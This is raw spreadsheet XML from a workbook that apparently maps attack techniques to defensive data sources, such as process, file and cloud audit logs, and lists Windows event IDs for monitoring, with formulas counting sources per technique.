        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C244" s="15" t="s">
        <v>1117</v>
      </c>
      <c r="D244" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E244" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="245" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A245" s="13" t="s">
        <v>1482</v>
      </c>
      <c r="B245" s="14" t="str">
        <f>LOOKUP(A245,'[1]REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C245" s="15" t="s">
        <v>1117</v>
      </c>
      <c r="D245" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E245" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="246" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A246" s="13" t="s">
        <v>1487</v>
      </c>
      <c r="B246" s="14" t="str">
        <f>LOOKUP(A246,'[1]REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process monitoring,API monitoring</v>
      </c>
      <c r="C246" s="15" t="s">
        <v>1117</v>
      </c>
      <c r="D246" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E246" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="247" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A247" s="13" t="s">
        <v>1493</v>
      </c>
      <c r="B247" s="14" t="str">
        <f>LOOKUP(A247,'[1]REF-DataSources'!A:C)</f>
        <v>Process monitoring,PowerShell logs,File monitoring,API monitoring</v>
      </c>
      <c r="C247" s="15" t="s">
        <v>1117</v>
      </c>
      <c r="D247" s="14">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E247" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="248" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A248" s="13" t="s">
        <v>1498</v>
      </c>
      <c r="B248" s="14" t="str">
        <f>LOOKUP(A248,'[1]REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,PowerShell logs</v>
      </c>
      <c r="C248" s="15" t="s">
        <v>1117</v>
      </c>
      <c r="D248" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E248" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="249" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A249" s="13" t="s">
        <v>1503</v>
      </c>
      <c r="B249" s="14" t="str">
        <f>LOOKUP(A249,'[1]REF-DataSources'!A:C)</f>
        <v>File monitoring,Application logs</v>
      </c>
      <c r="C249" s="15" t="s">
        <v>1109</v>
      </c>
      <c r="D249" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E249" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="250" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A250" s="13" t="s">
        <v>1509</v>
      </c>
      <c r="B250" s="14" t="str">
        <f>LOOKUP(A250,'[1]REF-DataSources'!A:C)</f>
        <v>Authentication logs,Office 365 account logs</v>
      </c>
      <c r="C250" s="15" t="s">
        <v>1109</v>
      </c>
      <c r="D250" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E250" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="251" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A251" s="13" t="s">
        <v>1517</v>
      </c>
      <c r="B251" s="14" t="str">
        <f>LOOKUP(A251,'[1]REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,API monitoring</v>
      </c>
      <c r="C251" s="15" t="s">
        <v>1117</v>
      </c>
      <c r="D251" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E251" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="252" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A252" s="13" t="s">
        <v>1522</v>
      </c>
      <c r="B252" s="14" t="str">
        <f>LOOKUP(A252,'[1]REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C252" s="15" t="s">
        <v>1117</v>
      </c>
      <c r="D252" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E252" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="253" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A253" s="13" t="s">
        <v>1525</v>
      </c>
      <c r="B253" s="14" t="str">
        <f>LOOKUP(A253,'[1]REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring</v>
      </c>
      <c r="C253" s="15" t="s">
        <v>1133</v>
      </c>
      <c r="D253" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E253" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="254" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A254" s="13" t="s">
        <v>1529</v>
      </c>
      <c r="B254" s="14" t="str">
        <f>LOOKUP(A254,'[1]REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Authentication logs</v>
      </c>
      <c r="C254" s="15" t="s">
        <v>1117</v>
      </c>
      <c r="D254" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E254" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="255" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A255" s="13" t="s">
        <v>1535</v>
      </c>
      <c r="B255" s="14" t="str">
        <f>LOOKUP(A255,'[1]REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C255" s="15">
        <v>100</v>
      </c>
      <c r="D255" s="14">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E255" s="14">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
    </row>
    <row r="256" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A256" s="13" t="s">
        <v>1540</v>
      </c>
      <c r="B256" s="14" t="str">
        <f>LOOKUP(A256,'[1]REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C256" s="15" t="s">
        <v>1127</v>
      </c>
      <c r="D256" s="14">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E256" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="257" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A257" s="13" t="s">
        <v>1546</v>
      </c>
      <c r="B257" s="14" t="str">
        <f>LOOKUP(A257,'[1]REF-DataSources'!A:C)</f>
        <v>OAuth audit logs,Office 365 account logs</v>
      </c>
      <c r="C257" s="15" t="s">
        <v>1173</v>
      </c>
      <c r="D257" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E257" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="258" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A258" s="13" t="s">
        <v>1553</v>
      </c>
      <c r="B258" s="14" t="str">
        <f>LOOKUP(A258,'[1]REF-DataSources'!A:C)</f>
        <v>Azure activity logs,OAuth audit logs</v>
      </c>
      <c r="C258" s="15" t="s">
        <v>1173</v>
      </c>
      <c r="D258" s="14">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E258" s="14">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
    </row>
    <row r="259" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A259" s="13" t="s">
        <v>1559</v>
      </c>
      <c r="B259" s="14" t="str">
        <f>LOOKUP(A259,'[1]REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C259" s="15" t="s">
        <v>1115</v>
      </c>
      <c r="D259" s="14">
        <f t="shared" ref="D259:D267" si="9">LEN(TRIM(B259))-LEN(SUBSTITUTE(TRIM(B259),",",""))+1</f>
        <v>3</v>
      </c>
      <c r="E259" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="260" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A260" s="13" t="s">
        <v>1564</v>
      </c>
      <c r="B260" s="14" t="str">
        <f>LOOKUP(A260,'[1]REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C260" s="15" t="s">
        <v>1115</v>
      </c>
      <c r="D260" s="14">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E260" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="261" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A261" s="13" t="s">
        <v>1569</v>
      </c>
      <c r="B261" s="14" t="str">
        <f>LOOKUP(A261,'[1]REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C261" s="15" t="s">
        <v>1115</v>
      </c>
      <c r="D261" s="14">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E261" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="262" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A262" s="13" t="s">
        <v>1573</v>
      </c>
      <c r="B262" s="14" t="str">
        <f>LOOKUP(A262,'[1]REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,DNS records,Anti-virus,Web proxy,File monitoring,Mail server,Office 365 trace logs</v>
      </c>
      <c r="C262" s="15" t="s">
        <v>1609</v>
      </c>
      <c r="D262" s="14">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="E262" s="14">
        <f t="shared" si="8"/>
        <v>7</v>
      </c>
    </row>
    <row r="263" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A263" s="13" t="s">
        <v>1578</v>
      </c>
      <c r="B263" s="14" t="str">
        <f>LOOKUP(A263,'[1]REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C263" s="15" t="s">
        <v>1115</v>
      </c>
      <c r="D263" s="14">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E263" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="264" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A264" s="13" t="s">
        <v>1582</v>
      </c>
      <c r="B264" s="14" t="str">
        <f>LOOKUP(A264,'[1]REF-DataSources'!A:C)</f>
        <v>Azure OS logs,AWS CloudTrail logs,Azure activity logs,Stackdriver logs,AWS OS logs</v>
      </c>
      <c r="C264" s="15" t="s">
        <v>1610</v>
      </c>
      <c r="D264" s="14">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E264" s="14">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
    </row>
    <row r="265" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A265" s="13" t="s">
        <v>1587</v>
      </c>
      <c r="B265" s="14" t="str">
        <f>LOOKUP(A265,'[1]REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C265" s="15" t="s">
        <v>1115</v>
      </c>
      <c r="D265" s="14">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E265" s="14">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
    </row>
    <row r="266" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A266" s="13" t="s">
        <v>1592</v>
      </c>
      <c r="B266" s="14" t="str">
        <f>LOOKUP(A266,'[1]REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C266" s="15" t="s">
        <v>1611</v>
      </c>
      <c r="D266" s="14">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E266" s="14">
        <f t="shared" ref="E266:E267" si="10">LEN(TRIM(C266))-LEN(SUBSTITUTE(TRIM(C266),";",""))+1</f>
        <v>4</v>
      </c>
    </row>
    <row r="267" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A267" s="13" t="s">
        <v>1598</v>
      </c>
      <c r="B267" s="14" t="str">
        <f>LOOKUP(A267,'[1]REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring</v>
      </c>
      <c r="C267" s="15" t="s">
        <v>1133</v>
      </c>
      <c r="D267" s="14">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E267" s="14">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting sqref="G2">
    <cfRule type="iconSet" priority="1">
      <iconSet iconSet="3Symbols2" reverse="1">
        <cfvo type="percent" val="0"/>
        <cfvo type="num" val="0" gte="0"/>
        <cfvo type="num" val="0" gte="0"/>
      </iconSet>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8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A8" sqref="A8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="22.6640625" customWidth="1"/>
    <col min="2" max="2" width="27.33203125" customWidth="1"/>
    <col min="3" max="3" width="54.6640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A1" s="2" t="s">
        <v>284</v>
      </c>
      <c r="B1" t="s">
        <v>285</v>
      </c>
      <c r="C1" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A2" s="2" t="s">
        <v>287</v>
      </c>
      <c r="B2" t="s">
        <v>285</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="2" t="s">
        <v>288</v>
      </c>
      <c r="B3" t="s">
        <v>285</v>
      </c>
      <c r="C3" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="2" t="s">
        <v>57</v>
      </c>
      <c r="B5" t="s">
        <v>290</v>
      </c>
      <c r="C5" t="s">
        <v>291</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" t="s">
        <v>292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47"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A14" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="B30" sqref="B30"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="30.6640625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="66.33203125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="27.5" customWidth="1"/>
    <col min="4" max="4" width="35.83203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="5" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="2" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A2" t="s">
        <v>4</v>
      </c>
      <c r="B2" t="s">
        <v>5</v>
      </c>
      <c r="D2" s="4">
        <v>8003</v>
      </c>
    </row>
    <row r="3" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A3" t="s">
        <v>4</v>
      </c>
      <c r="B3" t="s">
        <v>6</v>
      </c>
      <c r="D3" s="4">
        <v>8006</v>
      </c>
    </row>
    <row r="4" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A4" t="s">
        <v>4</v>
      </c>
      <c r="B4" t="s">
        <v>7</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="5" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A5" t="s">
        <v>9</v>
      </c>
      <c r="B5" t="s">
        <v>10</v>
      </c>
      <c r="D5" s="4">
        <v>1002</v>
      </c>
    </row>
    <row r="6" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A6" t="s">
        <v>9</v>
      </c>
      <c r="B6" t="s">
        <v>11</v>
      </c>
      <c r="D6" s="4">
        <v>1001</v>
      </c>
    </row>
    <row r="7" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A7" t="s">
        <v>9</v>
      </c>
      <c r="B7" t="s">
        <v>12</v>
      </c>
      <c r="D7" s="4">
        <v>2</v>
      </c>
    </row>
    <row r="8" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A8" t="s">
        <v>13</v>
      </c>
      <c r="B8" t="s">
        <v>14</v>
      </c>
      <c r="D8" s="4" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="9" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9" t="s">
        <v>16</v>
      </c>
      <c r="B9" t="s">
        <v>17</v>
      </c>
      <c r="D9" s="4">
        <v>2004</v>
      </c>
    </row>
    <row r="10" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10" t="s">
        <v>16</v>
      </c>
      <c r="B10" t="s">
        <v>18</v>
      </c>
      <c r="D10" s="4">
        <v>2005</v>
      </c>
    </row>
    <row r="11" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A11" t="s">
        <v>16</v>
      </c>
      <c r="B11" t="s">
        <v>19</v>
      </c>
      <c r="D11" s="4" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="12" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12" t="s">
        <v>21</v>
      </c>
      <c r="B12" t="s">
        <v>22</v>
      </c>
      <c r="D12" s="4">
        <v>104</v>
      </c>
    </row>
    <row r="13" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13" t="s">
        <v>21</v>
      </c>
      <c r="B13" t="s">
        <v>23</v>
      </c>
      <c r="D13" s="4">
        <v>1102</v>
      </c>
    </row>
    <row r="14" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14" t="s">
        <v>21</v>
      </c>
      <c r="B14" t="s">
        <v>24</v>
      </c>
      <c r="C14" t="s">
        <v>25</v>
      </c>
      <c r="D14" s="4">
        <v>6005</v>
      </c>
    </row>
    <row r="15" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15" t="s">
        <v>26</v>
      </c>
      <c r="B15" t="s">
        <v>27</v>
      </c>
      <c r="C15" t="s">
        <v>28</v>
      </c>
      <c r="D15" s="4">
        <v>6</v>
      </c>
    </row>
    <row r="16" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A16" t="s">
        <v>29</v>
      </c>
      <c r="B16" t="s">
        <v>30</v>
      </c>
      <c r="C16" t="s">
        <v>25</v>
      </c>
      <c r="D16" s="4">
        <v>5038</v>
      </c>
    </row>
    <row r="17" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A17" t="s">
        <v>29</v>
      </c>
      <c r="B17" t="s">
        <v>31</v>
      </c>
      <c r="C17" t="s">
        <v>25</v>
      </c>
      <c r="D17" s="4">
        <v>6281</v>
      </c>
    </row>
    <row r="18" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A18" t="s">
        <v>29</v>
      </c>
      <c r="B18" t="s">
        <v>32</v>
      </c>
      <c r="C18" t="s">
        <v>25</v>
      </c>
      <c r="D18" s="4" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="19" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19" t="s">
        <v>29</v>
      </c>
      <c r="B19" t="s">
        <v>34</v>
      </c>
      <c r="C19" t="s">
        <v>25</v>
      </c>
      <c r="D19" s="4">
        <v>219</v>
      </c>
    </row>
    <row r="20" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A20" t="s">
        <v>35</v>
      </c>
      <c r="B20" t="s">
        <v>36</v>
      </c>
      <c r="C20" t="s">
        <v>37</v>
      </c>
      <c r="D20" s="4">
        <v>1006</v>
      </c>
    </row>
    <row r="21" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21" t="s">
        <v>35</v>
      </c>
      <c r="B21" t="s">
        <v>38</v>
      </c>
      <c r="C21" t="s">
        <v>37</v>
      </c>
      <c r="D21" s="4">
        <v>1008</v>
      </c>
    </row>
    <row r="22" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22" t="s">
        <v>39</v>
      </c>
      <c r="B22" t="s">
        <v>40</v>
      </c>
      <c r="C22" t="s">
        <v>25</v>
      </c>
      <c r="D22" s="4">
        <v>4698</v>
      </c>
    </row>
    <row r="23" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A23" t="s">
        <v>41</v>
      </c>
      <c r="B23" t="s">
        <v>42</v>
      </c>
      <c r="C23" t="s">
        <v>43</v>
      </c>
      <c r="D23" s="4">
        <v>400</v>
      </c>
    </row>
    <row r="24" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A24" t="s">
        <v>44</v>
      </c>
      <c r="B24" t="s">
        <v>45</v>
      </c>
      <c r="C24" t="s">
        <v>28</v>
      </c>
      <c r="D24" s="4">
        <v>1</v>
      </c>
    </row>
    <row r="25" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A25" t="s">
        <v>44</v>
      </c>
      <c r="B25" t="s">
        <v>46</v>
      </c>
      <c r="C25" t="s">
        <v>25</v>
      </c>
      <c r="D25" s="4">
        <v>4688</v>
      </c>
    </row>
    <row r="26" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A26" t="s">
        <v>47</v>
      </c>
      <c r="B26" t="s">
        <v>48</v>
      </c>
      <c r="C26" t="s">
        <v>28</v>
      </c>
      <c r="D26" s="4">
        <v>2</v>
      </c>
    </row>
    <row r="27" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A27" t="s">
        <v>49</v>
      </c>
      <c r="B27" t="s">
        <v>50</v>
      </c>
      <c r="C27" t="s">
        <v>51</v>
      </c>
      <c r="D27" s="4">
        <v>21</v>
      </c>
    </row>
    <row r="28" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A28" t="s">
        <v>52</v>
      </c>
      <c r="B28" t="s">
        <v>53</v>
      </c>
      <c r="C28" t="s">
        <v>28</v>
      </c>
      <c r="D28" s="4">
        <v>3</v>
      </c>
    </row>
    <row r="29" spans="1:4" x14ac:dyDescent="0.2">
      <c r="D29" s="7">
        <v>7045</v>
      </c>
    </row>
    <row r="30" spans="1:4" x14ac:dyDescent="0.2">
      <c r="D30" s="7">
        <v>7030</v>
      </c>
    </row>
    <row r="31" spans="1:4" x14ac:dyDescent="0.2">
      <c r="D31" s="7">
        <v>1056</v>
      </c>
    </row>
    <row r="32" spans="1:4" ht="32" x14ac:dyDescent="0.2">
      <c r="D32" s="7" t="s">
        <v>54</v>
      </c>
    </row>
    <row r="33" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D33" s="7">
        <v>4624</v>
      </c>
    </row>
    <row r="34" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D34" s="7">
        <v>4625</v>
      </c>
    </row>
    <row r="35" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D35" s="7">
        <v>4698</v>
      </c>
    </row>
    <row r="36" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D36" s="7">
        <v>4720</v>
      </c>
    </row>
    <row r="37" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D37" s="7">
        <v>4722</v>
      </c>
    </row>
    <row r="38" spans="4:4" ht="16" x14ac:dyDescent="0.2">
      <c r="D38" s="7" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="39" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D39" s="7">
        <v>4728</v>
      </c>
    </row>
    <row r="40" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D40" s="7">
        <v>4732</v>
      </c>
    </row>
    <row r="41" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D41" s="7">
        <v>1102</v>
      </c>
    </row>
    <row r="42" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D42" s="7">
        <v>2</v>
      </c>
    </row>
    <row r="43" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D43" s="7">
        <v>2003</v>
      </c>
    </row>
    <row r="44" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D44" s="7">
        <v>8003</v>
      </c>
    </row>
    <row r="45" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D45" s="7">
        <v>8004</v>
      </c>
    </row>
    <row r="46" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D46" s="7">
        <v>1116</v>
      </c>
    </row>
    <row r="47" spans="4:4" x14ac:dyDescent="0.2">
      <c r="D47" s="7">
        <v>1117</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:E1" xr:uid="{00000000-0009-0000-0000-000003000000}"/>
  <conditionalFormatting sqref="C1:D1">
    <cfRule type="colorScale" priority="1">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent"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267"/>
  <sheetViews>
    <sheetView topLeftCell="A224" workbookViewId="0">
      <selection activeCell="B259" sqref="B259"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="2" max="2" width="54.6640625" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="255.6640625" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A1" s="12" t="s">
        <v>3</v>
      </c>
      <c r="B1" s="12" t="s">
        <v>383</v>
      </c>
      <c r="C1" s="12" t="s">
        <v>56</v>
      </c>
      <c r="D1" s="12" t="s">
        <v>384</v>
      </c>
      <c r="E1" s="12" t="s">
        <v>385</v>
      </c>
      <c r="F1" s="12" t="s">
        <v>386</v>
      </c>
      <c r="G1" s="12" t="s">
        <v>387</v>
      </c>
      <c r="H1" s="12" t="s">
        <v>1188</v>
      </c>
    </row>
    <row r="2" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A2" s="12" t="s">
        <v>60</v>
      </c>
      <c r="B2" s="12" t="s">
        <v>388</v>
      </c>
      <c r="C2" s="12" t="s">
        <v>389</v>
      </c>
      <c r="D2" s="12" t="s">
        <v>390</v>
      </c>
      <c r="E2" s="12" t="s">
        <v>391</v>
      </c>
      <c r="F2" s="12" t="s">
        <v>392</v>
      </c>
      <c r="G2" s="12" t="s">
        <v>393</v>
      </c>
      <c r="H2" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A3" s="12" t="s">
        <v>61</v>
      </c>
      <c r="B3" s="12" t="s">
        <v>394</v>
      </c>
      <c r="C3" s="12" t="s">
        <v>395</v>
      </c>
      <c r="D3" s="12" t="s">
        <v>396</v>
      </c>
      <c r="E3" s="12" t="s">
        <v>397</v>
      </c>
      <c r="F3" s="12" t="s">
        <v>398</v>
      </c>
      <c r="G3" s="12" t="s">
        <v>399</v>
      </c>
      <c r="H3" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A4" s="12" t="s">
        <v>62</v>
      </c>
      <c r="B4" s="12" t="s">
        <v>400</v>
      </c>
      <c r="C4" s="12" t="s">
        <v>401</v>
      </c>
      <c r="D4" s="12" t="s">
        <v>402</v>
      </c>
      <c r="E4" s="12" t="s">
        <v>1189</v>
      </c>
      <c r="F4" s="12" t="s">
        <v>1190</v>
      </c>
      <c r="G4" s="12" t="s">
        <v>403</v>
      </c>
      <c r="H4" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A5" s="12" t="s">
        <v>63</v>
      </c>
      <c r="B5" s="12" t="s">
        <v>404</v>
      </c>
      <c r="C5" s="12" t="s">
        <v>405</v>
      </c>
      <c r="D5" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E5" s="12" t="s">
        <v>407</v>
      </c>
      <c r="F5" s="12" t="s">
        <v>408</v>
      </c>
      <c r="G5" s="12" t="s">
        <v>409</v>
      </c>
      <c r="H5" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A6" s="12" t="s">
        <v>64</v>
      </c>
      <c r="B6" s="12" t="s">
        <v>410</v>
      </c>
      <c r="C6" s="12" t="s">
        <v>411</v>
      </c>
      <c r="D6" s="12" t="s">
        <v>1191</v>
      </c>
      <c r="E6" s="12" t="s">
        <v>412</v>
      </c>
      <c r="F6" s="12" t="s">
        <v>1192</v>
      </c>
      <c r="G6" s="12" t="s">
        <v>413</v>
      </c>
      <c r="H6" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A7" s="12" t="s">
        <v>65</v>
      </c>
      <c r="B7" s="12" t="s">
        <v>414</v>
      </c>
      <c r="C7" s="12" t="s">
        <v>300</v>
      </c>
      <c r="D7" s="12" t="s">
        <v>406</v>
      </c>
      <c r="E7" s="12" t="s">
        <v>415</v>
      </c>
      <c r="F7" s="12" t="s">
        <v>416</v>
      </c>
      <c r="G7" s="12" t="s">
        <v>417</v>
      </c>
      <c r="H7" s="12" t="s">
        <v>1193</v>
      </c>
    </row>
